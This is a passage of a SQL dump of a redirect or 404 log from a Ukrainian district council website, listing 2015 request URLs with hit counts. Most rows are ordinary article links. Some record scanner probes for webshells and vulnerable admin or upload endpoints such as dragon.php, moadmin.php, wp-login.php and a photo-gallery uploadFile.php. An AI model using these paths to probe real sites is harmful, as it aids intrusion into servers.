00:00:00',301),(13285,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=750:2012-09-01-09-40-02&catid=11&lang=en&Itemid=','','','',1,0,'2015-04-23 19:02:09','0000-00-00 00:00:00',301),(13286,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=750:2012-09-01-09-40-02&catid=11&lang=en&Itemid=0','','','',1,0,'2015-04-23 19:02:11','0000-00-00 00:00:00',301),(13287,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=750:2012-09-01-09-40-02&catid=11&lang=ru&Itemid=','','','',1,0,'2015-04-23 19:02:13','0000-00-00 00:00:00',301),(13288,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=750:2012-09-01-09-40-02&catid=11&lang=ru&Itemid=0','','','',1,0,'2015-04-23 19:02:16','0000-00-00 00:00:00',301),(13289,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=750:2012-09-01-09-40-02&catid=11&lang=uk&Itemid=','','','',1,0,'2015-04-23 19:02:18','0000-00-00 00:00:00',301),(13290,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=750:2012-09-01-09-40-02&catid=11&lang=uk&Itemid=0','','','',1,0,'2015-04-23 19:02:21','0000-00-00 00:00:00',301),(13291,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=751:-15-6-&catid=11&lang=en&Itemid=','','','',1,0,'2015-04-23 19:02:23','0000-00-00 00:00:00',301),(13292,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=751:-15-6-&catid=11&lang=en&Itemid=0','','','',1,0,'2015-04-23 19:02:29','0000-00-00 00:00:00',301),(13293,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=751:-15-6-&catid=11&lang=ru&Itemid=','','','',1,0,'2015-04-23 19:02:31','0000-00-00 00:00:00',301),(13294,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=751:-15-6-&catid=11&lang=ru&Itemid=0','','','',1,0,'2015-04-23 19:02:34','0000-00-00 00:00:00',301),(13295,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=751:-15-6-&catid=11&lang=uk&Itemid=','','','',1,0,'2015-04-23 19:02:36','0000-00-00 00:00:00',301),(13296,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=751:-15-6-&catid=11&lang=uk&Itemid=0','','','',1,0,'2015-04-23 19:02:38','0000-00-00 00:00:00',301),(13297,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=756:-2012-&catid=44&Itemid=83&lang=en','','','',1,0,'2015-04-23 19:02:58','0000-00-00 00:00:00',301),(13298,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=756:-2012-&catid=44&Itemid=83&lang=ru','','','',1,0,'2015-04-23 19:03:01','0000-00-00 00:00:00',301),(13299,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=758:--15---&catid=11&lang=ru&Itemid=0','','','',1,0,'2015-04-23 19:03:08','0000-00-00 00:00:00',301),(13300,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=758:--15---&catid=11&lang=uk&Itemid=0','','','',1,0,'2015-04-23 19:03:10','0000-00-00 00:00:00',301),(13301,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=763:2012-09-24-07-57-43&catid=11&lang=uk&Itemid=0','','','',2,0,'2015-04-23 19:04:52','0000-00-00 00:00:00',301),(13302,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=764:2012-09-26-12-58-07&catid=11&lang=ru&Itemid=','','','',8,0,'2015-04-23 19:04:59','0000-00-00 00:00:00',301),(13303,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=764:2012-09-26-12-58-07&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',2,0,'2015-04-23 19:05:01','0000-00-00 00:00:00',301),(13304,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=765:-qq&catid=11&lang=en&Itemid=','','','',5,0,'2015-04-23 19:05:03','0000-00-00 00:00:00',301),(13305,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=765:-qq&catid=11&lang=ru&Itemid=','','','',1,0,'2015-04-23 19:05:06','0000-00-00 00:00:00',301),(13306,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=777:2012-10-02-10-06-36&catid=45:--14112012-&Itemid=84&lang=en','','','',5,0,'2015-04-23 19:06:46','0000-00-00 00:00:00',301),(13307,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=779:2012-10-03-12-34-44&catid=11&lang=ru&Itemid=','','','',2,0,'2015-04-23 19:06:54','0000-00-00 00:00:00',301),(13308,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=779:2012-10-03-12-34-44&catid=11&lang=ru&Itemid=0','','','',1,0,'2015-04-23 19:06:56','0000-00-00 00:00:00',301),(13309,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=779:2012-10-03-12-34-44&catid=11&lang=uk&Itemid=','','','',1,0,'2015-04-23 19:06:59','0000-00-00 00:00:00',301),(13310,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1212:2014-02-07-07-01-38&catid=11&lang=ru&Itemid=0','','','',1,0,'2015-04-23 20:14:02','0000-00-00 00:00:00',301),(13311,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1224:----25--2014-&catid=11&lang=ru&Itemid=','','','',3,0,'2015-04-23 21:20:08','0000-00-00 00:00:00',301),(13312,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=836:-6732012&catid=11&lang=en&Itemid=','','','',1,0,'2015-04-23 21:21:59','0000-00-00 00:00:00',301),(13313,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=836:-6732012&catid=11&lang=ru&Itemid=','','','',5,0,'2015-04-23 21:22:01','0000-00-00 00:00:00',301),(13314,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=836:-6732012&catid=11&lang=uk&Itemid=','','','',1,0,'2015-04-23 21:22:07','0000-00-00 00:00:00',301),(13315,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=836:-6732012&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',3,0,'2015-04-23 21:22:10','0000-00-00 00:00:00',301),(13316,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=842:2012-12-10-13-55-57&catid=46&Itemid=85&lang=en','','','',1,0,'2015-04-23 21:22:44','0000-00-00 00:00:00',301),(13317,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=842:2012-12-10-13-55-57&catid=46&Itemid=85&lang=ru','','','',1,0,'2015-04-23 21:22:47','0000-00-00 00:00:00',301),(13318,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=842:2012-12-10-13-55-57&catid=46:--21122012&Itemid=85&lang=ru','','','',1,0,'2015-04-23 21:22:52','0000-00-00 00:00:00',301),(13319,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=855:2012-12-12-14-22-20&catid=11&lang=en&Itemid=','','','',1,0,'2015-04-23 21:22:55','0000-00-00 00:00:00',301),(13320,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=792:2012-10-17-06-26-37&catid=45:--14112012-&Itemid=84&lang=ru','','','',2,0,'2015-04-24 01:43:24','0000-00-00 00:00:00',301),(13321,'http://malyn-rayrada.org.ua/modules/cacheplugin.php','','','',3,0,'2015-04-24 02:07:47','0000-00-00 00:00:00',301),(13322,'http://www.malyn-rayrada.org.ua/modules/cacheplugin.php','','','',3,0,'2015-04-24 02:07:49','0000-00-00 00:00:00',301),(13323,'http://www.malyn-rayrada.org.ua/index.php/510-vidomosti-zaznacheni-v-deklaracii-pro-majno-dohodi','','','',74,0,'2015-04-24 10:22:40','0000-00-00 00:00:00',301),(13324,'http://www.malyn-rayrada.org.ua/index.php/255-vidbulas-14-sesija-malinskoi-rajonnoi-radi','','','',9,0,'2015-04-24 16:19:22','0000-00-00 00:00:00',301),(13325,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=212:2010-12-15-14-49-15&catid=29&Itemid=60&lang=uk','','','',6,0,'2015-04-24 20:41:01','0000-00-00 00:00:00',301),(13326,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=765:-qq&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',34,0,'2015-04-24 23:51:49','0000-00-00 00:00:00',301),(13327,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=471:2011-11-21-08-33-43&catid=36&Itemid=70&lang=uk','','','',13,0,'2015-04-25 00:16:57','0000-00-00 00:00:00',301),(13328,'http://www.malyn-rayrada.org.ua/index.php/800-prokuratura-malinskogo-rajonu-informue','','','',61,0,'2015-04-25 03:32:22','0000-00-00 00:00:00',301),(13329,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=714:2012-06-14-15-15-43&catid=36&Itemid=70&lang=en','','','',3,0,'2015-04-25 07:14:04','0000-00-00 00:00:00',301),(13330,'http://malyn-rayrada.org.ua/index.php/528-ocinka-rezultativ-dijalnosti-rajderzhadministracij','','','',8,0,'2015-04-25 09:17:32','0000-00-00 00:00:00',301),(13331,'http://www.malyn-rayrada.org.ua/index.php/203-zaversheno-pidgotovku-do-provedennja-chergovoi','','','',11,0,'2015-04-25 11:00:35','0000-00-00 00:00:00',301),(13332,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=836:-6732012&catid=11&lang=uk','','','',5,0,'2015-04-25 16:06:04','0000-00-00 00:00:00',301),(13333,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=836:-6732012&catid=11&lang=ru','','','',2,0,'2015-04-25 16:10:07','0000-00-00 00:00:00',301),(13334,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=836:-6732012&catid=11&lang=uk&Itemid=','','','',2,0,'2015-04-25 16:15:04','0000-00-00 00:00:00',301),(13335,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=836:-6732012&catid=11&lang=uk&Itemid=0','','','',1,0,'2015-04-25 16:30:18','0000-00-00 00:00:00',301),(13336,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=836:-6732012&catid=11&lang=ru&Itemid=0','','','',3,0,'2015-04-25 16:31:33','0000-00-00 00:00:00',301),(13337,'http://www.malyn-rayrada.org.ua/index.php/121-z-novim-rokom-ta-rizdvom-hristovim','','','',13,0,'2015-04-25 16:37:15','0000-00-00 00:00:00',301),(13338,'http://www.malyn-rayrada.org.ua/index.php?catid=45&id=817:---------------l--r&Itemid=84&lang=en&option=com_content&view=article','','','',4,0,'2015-04-25 23:18:01','0000-00-00 00:00:00',301),(13339,'http://www.malyn-rayrada.org.ua/index.php?catid=43:--25072012-&id=738:-c-&Itemid=82&lang=en&option=com_content&view=article','','','',2,0,'2015-04-25 23:18:04','0000-00-00 00:00:00',301),(13340,'http://www.malyn-rayrada.org.ua/index.php?catid=37:--21102011-&id=437:-----l-r--2012-2015-&Itemid=72&lang=ru&option=com_content&view=article','','','',2,0,'2015-04-25 23:19:35','0000-00-00 00:00:00',301),(13341,'http://www.malyn-rayrada.org.ua/index.php?catid=37:--21102011-&id=438:-----------l--r&Itemid=72&lang=ru&option=com_content&view=article','','','',4,0,'2015-04-25 23:19:57','0000-00-00 00:00:00',301),(13342,'http://www.malyn-rayrada.org.ua/index.php?catid=38:--19122011-&id=510:-2011-&Itemid=73&lang=uk&option=com_content&view=article','','','',2,0,'2015-04-25 23:20:11','0000-00-00 00:00:00',301),(13343,'http://www.malyn-rayrada.org.ua/index.php/212-do-vidoma-vodiiv','','','',55,0,'2015-04-26 01:29:12','0000-00-00 00:00:00',301),(13344,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=276:---4-----6--25032011-&catid=31&Itemid=62&lang=uk','','','',15,0,'2015-04-26 04:58:03','0000-00-00 00:00:00',301),(13345,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/757-informacija-malinivskoi-silskoi-radi','','','',6,0,'2015-04-26 09:21:26','0000-00-00 00:00:00',301),(13346,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/754-informacija-slobidskoi-silskoi-radi','','','',4,0,'2015-04-26 09:26:23','0000-00-00 00:00:00',301),(13347,'http://malyn-rayrada.org.ua/images/stories/dragon.php?rf','','','',1,0,'2015-04-26 14:15:47','0000-00-00 00:00:00',301),(13348,'http://malyn-rayrada.org.ua/index.php/1064-khristiyani-svyatkuyut-verbnu-nedilyu-katoliki-velikden','','','',3,0,'2015-04-26 20:50:00','0000-00-00 00:00:00',301),(13349,'http://www.malyn-rayrada.org.ua/index.php/725-pro-priznachennja-s-kizina-golovoju-zhitomirskoi','','','',9,0,'2015-04-26 23:38:27','0000-00-00 00:00:00',301),(13350,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=778:2012-10-03-08-53-07&catid=45:--14112012-&Itemid=84&lang=uk','','','',2,0,'2015-04-27 00:17:44','0000-00-00 00:00:00',301),(13351,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=763:2012-09-24-07-57-43&catid=11&lang=en&Itemid=','','','',18,0,'2015-04-27 00:49:45','0000-00-00 00:00:00',301),(13352,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=714:2012-06-14-15-15-43&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',4,0,'2015-04-27 01:37:06','0000-00-00 00:00:00',301),(13353,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=714:2012-06-14-15-15-43&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',7,0,'2015-04-27 01:49:47','0000-00-00 00:00:00',301),(13354,'http://www.malyn-rayrada.org.ua/index.php/1007-malinski-podatkivtsi-zaproshuyut-na-seminar?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-04-27 06:13:29','0000-00-00 00:00:00',301),(13355,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/779-informacija-ustinivskoi-silskoi-radi','','','',40,0,'2015-04-27 06:14:31','0000-00-00 00:00:00',301),(13356,'http://malyn-rayrada.org.ua/index.php/809-upravlinnja-finansiv-rajderzhadministracii','','','',4,0,'2015-04-27 19:10:35','0000-00-00 00:00:00',301),(13357,'http://www.malyn-rayrada.org.ua/index.php?catid=31:-25032011&id=276:---4-----6--25032011-&Itemid=62&lang=ru&option=com_content&view=article','','','',1,0,'2015-04-27 23:59:36','0000-00-00 00:00:00',301),(13358,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1008-pro-zatverdzhennya-spisku-prisyazhnikh-malinskogo-rajonnogo-sudu?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-04-28 06:21:38','0000-00-00 00:00:00',301),(13359,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1268:---------------l-r&catid=36&Itemid=70&lang=en','','','',5,0,'2015-04-28 07:58:55','0000-00-00 00:00:00',301),(13360,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1008-pro-zatverdzhennya-spisku-prisyazhnikh-malinskogo-rajonnogo-sudu?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-04-28 08:32:54','0000-00-00 00:00:00',301),(13361,'http://malyn-rayrada.org.ua/wp-admin/wp-login.php','','','',7,0,'2015-04-28 08:55:24','0000-00-00 00:00:00',301),(13362,'http://malyn-rayrada.org.ua/cms/wp-login.php','','','',7,0,'2015-04-28 08:55:30','0000-00-00 00:00:00',301),(13363,'http://www.malyn-rayrada.org.ua/wp-admin/wp-login.php','','','',4,0,'2015-04-28 08:56:02','0000-00-00 00:00:00',301),(13364,'http://www.malyn-rayrada.org.ua/cms/wp-login.php','','','',4,0,'2015-04-28 08:56:09','0000-00-00 00:00:00',301),(13365,'http://www.malyn-rayrada.org.ua/template/default/common/footer.htm','','http://www.malyn-rayrada.org.ua','',1,0,'2015-04-28 15:37:45','0000-00-00 00:00:00',301),(13366,'http://www.malyn-rayrada.org.ua/moadmin.php','','http://www.malyn-rayrada.org.ua','',2,0,'2015-04-28 15:38:13','0000-00-00 00:00:00',301),(13367,'http://www.malyn-rayrada.org.ua/moadmin/moadmin.php','','http://www.malyn-rayrada.org.ua','',2,0,'2015-04-28 15:38:15','0000-00-00 00:00:00',301),(13368,'http://www.malyn-rayrada.org.ua/phpmoadmin/moadmin.php','','http://www.malyn-rayrada.org.ua','',2,0,'2015-04-28 15:38:19','0000-00-00 00:00:00',301),(13369,'http://www.malyn-rayrada.org.ua/index.php/311-zaversheno-pidgotovku-do-provedennja-chergovoi_2','','','',10,0,'2015-04-29 01:16:48','0000-00-00 00:00:00',301),(13370,'http://www.malyn-rayrada.org.ua/index.php/471-upravlinnja-statistiki-u-m-malini-informue_2','','','',6,0,'2015-04-29 05:47:46','0000-00-00 00:00:00',301),(13371,'http://malyn-rayrada.org.ua//administrator/components/com_simplephotogallery/lib/uploadFile.php','','','',1,0,'2015-04-30 03:45:57','0000-00-00 00:00:00',301),(13372,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=276:---4-----6--25032011-&catid=31&Itemid=62&lang=en','','','',1,0,'2015-04-30 04:59:41','0000-00-00 00:00:00',301),(13373,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=276:---4-----6--25032011-&catid=31&Itemid=62&lang=ru','','','',7,0,'2015-04-30 04:59:44','0000-00-00 00:00:00',301),(13374,'http://www.malyn-rayrada.org.ua//administrator/components/com_simplephotogallery/lib/uploadFile.php','','','',1,0,'2015-04-30 10:18:25','0000-00-00 00:00:00',301),(13375,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=778:2012-10-03-08-53-07&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',4,0,'2015-04-30 11:04:37','0000-00-00 00:00:00',301),(13376,'http://www.malyn-rayrada.org.ua/index.php/547-pro-zatverdzhennja-porjadku-ta-umov-viznachennja','','','',7,0,'2015-04-30 15:55:10','0000-00-00 00:00:00',301),(13377,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/765-informacija-vishivskoi-silskoi-radi','','','',8,0,'2015-04-30 16:01:41','0000-00-00 00:00:00',301),(13378,'http://www.malyn-rayrada.org.ua/index.php/61-splivajut-ostanni-godini-dlja-podachi-dokumentiv','','','',16,0,'2015-04-30 21:18:27','0000-00-00 00:00:00',301),(13379,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=313:----------2011-2015-&catid=33:-20052011&Itemid=66&lang=uk','','','',3,0,'2015-04-30 21:21:44','0000-00-00 00:00:00',301),(13380,'http://www.malyn-rayrada.org.ua/index.php/708-ugoda-z-vreguljuvannja-krizi-bude-pidpisana-v-12','','','',24,0,'2015-04-30 21:34:29','0000-00-00 00:00:00',301),(13381,'http://www.malyn-rayrada.org.ua/index.php/78-narada-shhodo-nagalnih-pitan-rajonu','','','',101,0,'2015-05-01 04:54:22','0000-00-00 00:00:00',301),(13382,'http://malyn-rayrada.org.ua/index.php/311-zaversheno-pidgotovku-do-provedennja-chergovoi_2','','','',4,0,'2015-05-01 08:52:57','0000-00-00 00:00:00',301),(13383,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/images/stories/zukraine.gif','','','',2,0,'2015-05-01 12:47:25','0000-00-00 00:00:00',301),(13384,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/780-informacija-shevchenkivskoi-silskoi-radi','','','',131,0,'2015-05-01 17:06:01','0000-00-00 00:00:00',301),(13385,'http://malyn-rayrada.org.ua/bitrix/admin/','','','',1,0,'2015-05-01 17:19:35','0000-00-00 00:00:00',301),(13386,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/758-informacija-josipivskoi-silskoi-radi','','','',17,0,'2015-05-01 19:14:13','0000-00-00 00:00:00',301),(13387,'http://www.malyn-rayrada.org.ua/index.php/738-pro-chastkovu-mobilizaciju','','','',94,0,'2015-05-01 19:35:53','0000-00-00 00:00:00',301),(13388,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=547:----------l---------r--2011-2016-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',4,0,'2015-05-01 19:59:19','0000-00-00 00:00:00',301),(13389,'http://www.malyn-rayrada.org.ua/index.php/186-vikonannja-dohidnoi-chastini-za-4-misjaci-v','','','',11,0,'2015-05-01 20:36:43','0000-00-00 00:00:00',301),(13390,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/777-informacija-pirizhkivskoi-silskoi-radi','','','',8,0,'2015-05-01 22:33:54','0000-00-00 00:00:00',301),(13391,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1322:------------2012-2015-&Itemid=70&lang=ru','','','',1,0,'2015-05-01 22:37:07','0000-00-00 00:00:00',301),(13392,'http://www.malyn-rayrada.org.ua/index.php/77-sklad-novogo-kabinetu-ministriv-ukraini','','','',7,0,'2015-05-02 00:10:35','0000-00-00 00:00:00',301),(13393,'http://www.malyn-rayrada.org.ua/index.php/298-zasluzhenomu-budivelniku-ukraini-viktoru-jakovichu','','','',53,0,'2015-05-02 01:45:12','0000-00-00 00:00:00',301),(13394,'http://malyn-rayrada.org.ua/index.php/708-ugoda-z-vreguljuvannja-krizi-bude-pidpisana-v-12','','','',6,0,'2015-05-02 12:10:15','0000-00-00 00:00:00',301),(13395,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=276:---4-----6--25032011-&catid=31&Itemid=62&lang=uk','','','',1,0,'2015-05-02 14:12:40','0000-00-00 00:00:00',301),(13396,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=738:-c-&catid=43&Itemid=82&lang=ru','','','',2,0,'2015-05-02 20:14:58','0000-00-00 00:00:00',301),(13397,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=716:2012-06-14-15-19-24&catid=43&Itemid=82&lang=ru','','','',2,0,'2015-05-02 20:16:30','0000-00-00 00:00:00',301),(13398,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=746:-2012-&catid=43:--25072012-&Itemid=82&lang=ru','','','',4,0,'2015-05-02 20:17:19','0000-00-00 00:00:00',301),(13399,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1270:2014-04-08-13-49-40&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',3,0,'2015-05-02 20:17:20','0000-00-00 00:00:00',301),(13400,'http://www.malyn-rayrada.org.ua/index.php/1011-p-l-a-n-grafik-provedennya-zasidan-postijnikh-komisij-malinskoji-rajonnoji-radi?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-05-03 07:15:40','0000-00-00 00:00:00',301),(13401,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=800:-l-r&catid=45:--14112012-&Itemid=84&lang=ru','','','',7,0,'2015-05-03 14:01:33','0000-00-00 00:00:00',301),(13402,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=716:2012-06-14-15-19-24&catid=43&Itemid=82&lang=uk','','','',5,0,'2015-05-05 12:35:01','0000-00-00 00:00:00',301),(13403,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=716:2012-06-14-15-19-24&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',2,0,'2015-05-05 12:39:07','0000-00-00 00:00:00',301),(13404,'http://malyn-rayrada.org.ua/components/com_rsfiles/index.html','','http://malyn-rayrada.org.ua/components/com_rsfiles/index.html','',1,0,'2015-05-05 14:56:52','0000-00-00 00:00:00',301),(13405,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=757:2012-09-12-09-47-49&catid=44:--12092012-&Itemid=83&lang=ru','','','',7,0,'2015-05-05 22:37:14','0000-00-00 00:00:00',301),(13406,'http://www.malyn-rayrada.org.ua/index.php/842-informacija-shhodo-indeksacii-pensij?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-05-05 22:38:19','0000-00-00 00:00:00',301),(13407,'http://malyn-rayrada.org.ua/components/com_spidercalendar/index.html','','http://malyn-rayrada.org.ua/components/com_spidercalendar/index.html','',1,0,'2015-05-06 01:57:55','0000-00-00 00:00:00',301),(13408,'http://malyn-rayrada.org.ua/index.php/882-pro-sotsialno-ekonomichne-stanovishche-malinskogo-rajonu-za-sichen-serpen-2014-roku','','','',6,0,'2015-05-06 11:07:16','0000-00-00 00:00:00',301),(13409,'http://malyn-rayrada.org.ua/components/com_jcalpro/cal_popup.php','','http://malyn-rayrada.org.ua/components/com_jcalpro/cal_popup.php','',1,0,'2015-05-06 12:49:45','0000-00-00 00:00:00',301),(13410,'http://www.malyn-rayrada.org.ua/index.php/848-nachalnik-upravlinnja-derzhzemagentstva-u?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-05-07 00:18:11','0000-00-00 00:00:00',301),(13411,'http://malyn-rayrada.org.ua/components/com_extcalendar/cal_popup.php','','http://malyn-rayrada.org.ua/components/com_extcalendar/cal_popup.php','',1,0,'2015-05-07 01:10:12','0000-00-00 00:00:00',301),(13412,'http://malyn-rayrada.org.ua/index.php/817-kolektiv-rajonnoi-radi-priednuetsja-do-vitan?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-05-07 02:33:00','0000-00-00 00:00:00',301),(13413,'http://www.malyn-rayrada.org.ua/index.php/836-komunalne-pidpriemstvo-arhplan-malinskoi-rajonnoi?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-05-07 18:44:04','0000-00-00 00:00:00',301),(13414,'http://malyn-rayrada.org.ua/index.php/855-pro-dostrokove-pripinennja-povnovazhen-verhovnoi','','','',6,0,'2015-05-07 20:07:40','0000-00-00 00:00:00',301),(13415,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=548:-2011-2015-&catid=39&Itemid=76&lang=uk','','','',6,0,'2015-05-08 10:36:46','0000-00-00 00:00:00',301),(13416,'http://www.malyn-rayrada.org.ua/index.php/838-upravlinnja-statistiki-u-m-malini-informue-3?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-05-08 14:37:32','0000-00-00 00:00:00',301),(13417,'http://malyn-rayrada.org.ua/index.php/471-upravlinnja-statistiki-u-m-malini-informue_2','','','',6,0,'2015-05-08 15:45:42','0000-00-00 00:00:00',301),(13418,'http://www.malyn-rayrada.org.ua/index.php/876-sluzhba-bezpeki-informue?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-05-08 17:16:34','0000-00-00 00:00:00',301),(13419,'http://malyn-rayrada.org.ua/index.php/256-upravlinnja-pfu-v-malinskomu-rajoni-informue','','','',5,0,'2015-05-08 21:28:19','0000-00-00 00:00:00',301),(13420,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=765:-qq&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',1,0,'2015-05-09 01:07:51','0000-00-00 00:00:00',301),(13421,'http://www.malyn-rayrada.org.ua/index.php/716-pro-sklikannja-28-pozachergovoi-sesii-rajonnoi','','','',66,0,'2015-05-09 18:23:53','0000-00-00 00:00:00',301),(13422,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=800:-l-r&catid=45:--14112012-&Itemid=84&lang=en','','','',5,0,'2015-05-09 23:37:45','0000-00-00 00:00:00',301),(13423,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=800:-----l--r&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',2,0,'2015-05-10 00:02:15','0000-00-00 00:00:00',301),(13424,'http://malyn-rayrada.org.ua/index.php/325-ukrainci-perevedut-strilki-godinnika-na-godinu','','','',4,0,'2015-05-10 04:49:02','0000-00-00 00:00:00',301),(13425,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=765:-qq&catid=11&lang=en','','','',4,0,'2015-05-10 06:12:47','0000-00-00 00:00:00',301),(13426,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=765:-qq&catid=11&lang=en','','','',3,0,'2015-05-10 06:15:53','0000-00-00 00:00:00',301),(13427,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=765:-qq&catid=11&lang=en&Itemid=','','','',1,0,'2015-05-10 06:35:18','0000-00-00 00:00:00',301),(13428,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=765:-qq&catid=11&lang=en&Itemid=0','','','',2,0,'2015-05-10 06:41:44','0000-00-00 00:00:00',301),(13429,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=512:2011-12-21-12-46-13&catid=36&Itemid=70&lang=uk','','','',4,0,'2015-05-10 06:47:50','0000-00-00 00:00:00',301),(13430,'http://www.malyn-rayrada.org.ua/index.php/257-do-vidoma-vlasnikiv-avto','','','',11,0,'2015-05-10 06:57:48','0000-00-00 00:00:00',301),(13431,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=409:-2011-&catid=37&Itemid=72&lang=uk','','','',4,0,'2015-05-10 08:24:40','0000-00-00 00:00:00',301),(13432,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=709:2012-06-14-15-04-11&catid=43&Itemid=82&lang=uk','','','',4,0,'2015-05-10 16:45:21','0000-00-00 00:00:00',301),(13433,'http://malyn-rayrada.org.ua/index.php/809-upravlinnja-finansiv-rajderzhadministracii?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-05-11 06:07:36','0000-00-00 